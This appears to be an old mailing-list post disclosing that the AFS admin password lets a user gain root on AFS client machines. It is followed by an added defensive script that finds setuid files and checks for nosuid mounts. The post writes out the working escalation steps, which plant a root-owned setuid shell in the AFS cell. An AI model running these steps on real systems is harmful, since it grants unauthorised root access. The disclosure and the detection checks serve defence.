Hi all,
At Brookhaven National Lab, we just found something very interesting.
That is, if you know the AFS admin password, you can become root on any
AFS client machine in the cell (except Solaris machines). We did the following tests
on AIX, SGI, and HPUX and we succeeded. Solaris somehow is smart enough to stop the
break-in.
Log in as a user on any AFS client machine belonging to your cell:
% klog admin
% cd /afs/<your-cell>
% cp /bin/sh .
% chown root sh
% chmod 4755 sh
% ./sh
% whoami
root
In other words, if I am the AFS administrator, I can be root on any AFS client machine
belonging to my cell. Is it cool?
Tom Nguyen
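Two defender-side checks for the issue described in the post, as an added example that is not part of the original message: one lists setuid files under a directory (on a real client you would point it at /afs), the other checks whether a mount point is mounted with nosuid, which is what stops a setuid bit on an AFS file from being honoured. The directory contents and the mounts table used in the demo are constructed, so the script runs without AFS installed.

```shell
#!/bin/sh
# Added example, not code from the original post.

# Print regular files under DIR that carry the setuid bit (mode 4000),
# the bit the post sets with "chmod 4755 sh".
find_setuid_files() {
    dir="$1"
    find "$dir" -type f -perm -4000 2>/dev/null | sort
}

# Return 0 if the entry for MOUNTPOINT in MOUNTS_FILE (default /proc/mounts,
# format: device mountpoint fstype options dump pass) includes "nosuid",
# 1 otherwise.
mount_has_nosuid() {
    mountpoint="$1"
    mounts_file="${2:-/proc/mounts}"
    awk -v mp="$mountpoint" '
        $2 == mp { n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "nosuid") found = 1 }
        END { exit found ? 0 : 1 }' "$mounts_file"
}

# Demo on a constructed directory tree and two constructed mounts tables.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/cell"
    : > "$tmp/cell/sh";     chmod 4755 "$tmp/cell/sh"      # setuid, as in the post
    : > "$tmp/cell/readme"; chmod 0644 "$tmp/cell/readme"  # ordinary file
    echo "Setuid files under $tmp/cell:"
    find_setuid_files "$tmp/cell"

    printf '%s\n' 'AFS /afs afs rw,nosuid 0 0' > "$tmp/mounts.nosuid"
    printf '%s\n' 'AFS /afs afs rw 0 0'        > "$tmp/mounts.suid"
    if mount_has_nosuid /afs "$tmp/mounts.nosuid"; then
        echo "/afs mounted nosuid: setuid bits ignored (good)"
    fi
    if ! mount_has_nosuid /afs "$tmp/mounts.suid"; then
        echo "/afs mounted without nosuid: setuid bits honoured (bad)"
    fi
    rm -rf "$tmp"
}

demo
```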